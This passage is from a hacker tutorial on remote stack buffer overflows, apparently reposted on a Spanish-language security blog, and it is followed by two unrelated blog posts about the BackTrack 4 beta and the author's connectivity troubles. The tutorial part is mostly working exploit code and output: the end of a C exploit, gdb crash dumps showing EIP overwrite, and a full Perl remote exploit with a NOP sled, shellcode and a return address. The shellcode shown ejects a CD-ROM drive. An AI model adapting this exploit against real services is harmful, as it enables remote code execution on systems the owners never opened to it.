/* this is the part where our payload gets sent */

send(fd,payload,strlen(payload),0);

/* this is extra information which is displayed after sending the payload */

printf("Payload Size: %i\n",sizeof(payload));
printf("Payload Sent..\n");

}

---

Let's start compiling our exploit,

client:
---
gcc server_exploit.c -o server_exploit

./server_exploit 192.168.1.101
Payload Size: 272
Payload Sent..

---

server:
---

bash-3.00# ./server
got connection from 192.168.1.100
The client says "jX1?Qhdromhev/ch///d??ð6f? S? @?BBBB"
^[[?1;2cSegmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb)
(gdb) i r eip
eip 0x42424242 0x42424242
(gdb) x/1000xb $esp
0xbffff2b0: 0x02 0x00 0xff 0xbf 0xc0 0xf2 0xff 0xbf
0xbffff2b8: 0x00 0x04 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff2c0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff300: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff308: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff310: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff318: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff320: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff328: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff330: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff338: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff340: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff348: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff350: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff358: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff360: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff368: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff370: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff378: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff380: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff388: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90

---

As you can see we have overwritten the extended instruction pointer once again
and you can see our nopsled above in memory

Let's pick a random address from the nopsled,

0xbffff2f8

write it in little-endian format (more info: http://www.answers.com/topic/endianness)

EIP:

\xf8\xf2\xff\xbf

and let's replace the old EIP with the new one in our "server_exploit.c" program

so:

char *eip = "\x42\x42\x42\x42";

becomes

char *eip = "\xf8\xf2\xff\xbf";

and let's recompile the program,

gcc server_exploit.c -o server_exploit

client:
---

./server_exploit 192.168.1.101
Payload Size: 272
Payload Sent..
---

server:
---
bash-3.00# ./server
got connection from 192.168.1.100
The client says "jX1?Qhdromhev/ch///d??ð6f? S? @?????"
^[[?1;2cbash-3.00# 1;2c
---

and yes, my cd-rom drive ejected....

as you can see we have managed to successfully exploit a remote
buffer overflow by using c code. Some people have allot of problems with
c , they find it hard or they are to lazy to learn it :PpPppP

Perl is allot easier to learn in my opinion and would be confortable for
some people.The next section will use Perl to exploit this vulnerability
and open the cd-rom drive of the computer.

[1.5]--[ Payload/Code construction/analyses in Perl

Let's start again by sending a 272 byte buffer to the server in Perl,

send_overflow.pl
---

#!/usr/bin/perl

####################################################################
#
#-- Send overflow (Perl version) written by Preddy
#
# Part of Preddy's Remote Exploitation with C and Perl tutorial
#
# Usage: perl send_overflow.pl
#
# Example: perl send_overflow.pl 192.168.1.101
#
####################################################################

#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our payload which is 272 bytes of A (0x41,x41)
$payload = "\x41"x272;

#view a message if no ip address is given
if(!$ip)
{

die "Specify ip plz..\n";

}

#the remote port to connect to
$port = '7500';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Could not create socket\n";

#send the payload to the remote computer
print $socket $payload;

#close the connection
close($socket);

---

Let's start by running the script without any arguments,

perl send_overflow.pl
Specify ip plz..

And let's send the payload (272 x A - 0x41)

client:
---
perl send_overflow.pl 192.168.1.101

---

server:
---

bash-3.00# ./server
got connection from 192.168.1.100
The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
Segmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
(gdb) i r eip
eip 0x41414141 0x41414141
---

as you can see we have overwritten eip ,

now let's construct our payload

[NOPSLED - 228 bytes] + [SHELLCODE - 40 bytes] + [EIP - 4 bytes] = 272 bytes

we can just use the same payload from the C section
in it's perl form.

server_exploit.pl
---
#!/usr/bin/perl

####################################################################
#
#-- Server Exploit (Perl version) written by Preddy
#
# Part of Preddy's Remote Exploitation with C and Perl tutorial
#
# Usage: perl server_exploit.pl
#
# Example: perl server_exploit.pl 192.168.1.101
#
####################################################################

#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our nopsled
$nopsled = "\x90"x228;

#our shellcode which opens the remote cd-rom drive - 40 bytes (thanks to izik)
$shellcode = "\x6a\x05". # push $0x5
"\x58". # pop %eax
"\x31\xc9". # xor %ecx,%ecx
"\x51". # push %ecx
"\xb5\x08". # mov $0x8,%ch
"\x68\x64\x72\x6f\x6d". # push $0x6d6f7264
"\x68\x65\x76\x2f\x63". # push $0x632f7665
"\x68\x2f\x2f\x2f\x64". # push $0x642f2f2f
"\x89\xe3". # mov %esp,%ebx
"\xcd\x80". # int $0x80
"\x89\xc3". # mov %eax,%ebx
"\xb0\x36". # mov $0x36,%al
"\x66\xb9\x09\x53". # mov $0x5309,%cx
"\xcd\x80". # int $0x80
"\x40". # inc %eax
"\xcd\x80"; # int $0x80

#our extended instruction pointer which we use to overwrite the remote eip
$eip = "\xf8\xf2\xff\xbf";

#we construct our full payload here
$payload = $nopsled.$shellcode.$eip;

#view a message if no ip address is given
if(!$ip)
{

die "Specify ip plz..\n";

}

#the remote port to connect to
$port = '7500';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Could not create socket\n";

#send the payload to the remote computer
print $socket $payload;

#close the connection
close($socket);

---
Let's run the perl script again:

perl server_exploit.pl 192.168.1.101

and yes! my cd-rom drive opened again :) what a miracle.. :PpPppP
(kids: don't irritate your father's box by continuesly opening his cd-rom drive)

[1.6]--[ Conclusion

Well we have learned to construct payloads and write exploits which
use those payloads. A good thing to do is to learn more about different
types of overflows and their exploitation methods, also practicing
different types of programming languages could be usefull.

[1.7]--[ Contact & Feedback

You can contact me by,

IRC:

FREENODE: ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
MILW0RM: #milw0rm
GSO: #gso-chat
STS: #lecture,#social

IM , msn : preddy @hushmail.com

EMAIL, : m4ilinglists @gmail.com

please notify me of any mistake's which I might have made :)
or any other comments..

Cya around guyz,

Preddy

lol

Lanzada Beta De Backtrack4 Basada En Ubuntu :D

noreply@blogger.com (H4x0r Security Group) — Tue, 24 Feb 2009 15:16:00 -0800

Aunque no es una gran noticia ni tampoco nueva ya fue lanzada la version nueva de Backtrack4 en su edicion beta...

yo ya la descargue personalmente y el cambio de la base distro de Slackware (slax) a Debian
(ubuntu) no es muy favorecido de mi parte...

por lo que puedo analizar que los desarrolladores de backtrack solo querian implementar mas al usuario "newbie" o usuario normal y la compatibilidad de hardware que carecia la revision pasada con su nuevo kernel...

cuenta con repositorios de la comunidad "Ubuntu" y su gestor de paquetes synaptic aunque para los que no le gustan el gestor todavia existe "apt" en fin la orientacion es que los desarrolladores tienen miras a competir con las distribuciones mas populares...

en este caso sigue siendo una distribucion de linux live orientada a la auditoria de sistemas/wireless/lan/servidores/passwords/forense para mi una buena distribucion si no la mejor para estos fines de auditorias de seguridad...

muchos profesionales IT opinan que es la mejor suite de herramientas para estos fines y yo no difiero con ellos...

desde la practica del "Ethical Hacking" (Hacking Etico) hasta practicas Script Kiddies.
o rituales de Lammers en fin pueden usarlo todo tipo de personas no significa que usarla te convierte en alguno de esos terminos en esta revision buscaron hacerla un poco mas amigable para el usuario normal..

aunque cabe recalcar que sigue siendo una suite y conjunto de herramientas orientadas al IT o auditorias..

esta revision cuenta con algunos cambios como:

Soporte para tarjetas pico e10 y e12 (para UMPCs)
Posibilidad de arrancar por red mediante PXE
Versión limitada de la herramienta SAINT Exploit
Versión libre de Maltego
Actualizaciones en los drivers de tarjetas wireless, necesarios para auditorías
Soporte RFID
Nuevas herramientas de seguridad.

Aunque no son muchas los cambios no son muy notables referentes a la organizacion del menu sigue siendo kde 3.5 y no la ultima version 4.0 (los rumores son que para la version final lo sera) se le agregaron solo algunas herramientas...

en fin igual los desarrolladores De Remote Exploit hicieron nuevamente un gran trabajo con la mejor live cd de seguridad que existe (Hacking)...

y esperamos que cuando se realize el lanzamiento de la version final se aun mas prometedora,vuelvo y recalco que no favorezco mucho su cambio de slax a ubuntu pero en fin los desarrolladores de dicha live cd hacen su trabajo de manera excelente...

para obtener Backtrack 4 la pueden obtener desde su sitio web :
Version Dvd Aqui.
Version Para Vmware Aqui.
Imagen Para Adherir Al Cd Label.

Traeremos actualizaciones siguientes al lanzamiento de la version final

Pd: La lista de herramientas de Backtrack4 la pueden conseguir aqui LINK

salu2

Conectividad [Problema Resuelto]

noreply@blogger.com (H4x0r Security Group) — Tue, 24 Feb 2009 13:27:00 -0800

Ya llegue al infierno aqui las temperaturas varian notablemente de 40 grados suben a la hora pico a los 100 grados :D...

en fin ni que hablar de la conexion de internet aparte de que tienen censurados la mayoria de los sitios que conozco si posees tu tarjeta de internet debes hacer miles de cosas para conectarte...

malditos en fin ya puedo conectarme y a poner al dia mi maldito blog ya que por si es mi unica herramienta que poseo para entretenerme o expresar lo que estoy pasando con esta nueva etapa en mi vida...

1st Squad,3rd Platoon,Echo Company 2-54 U.S.M.C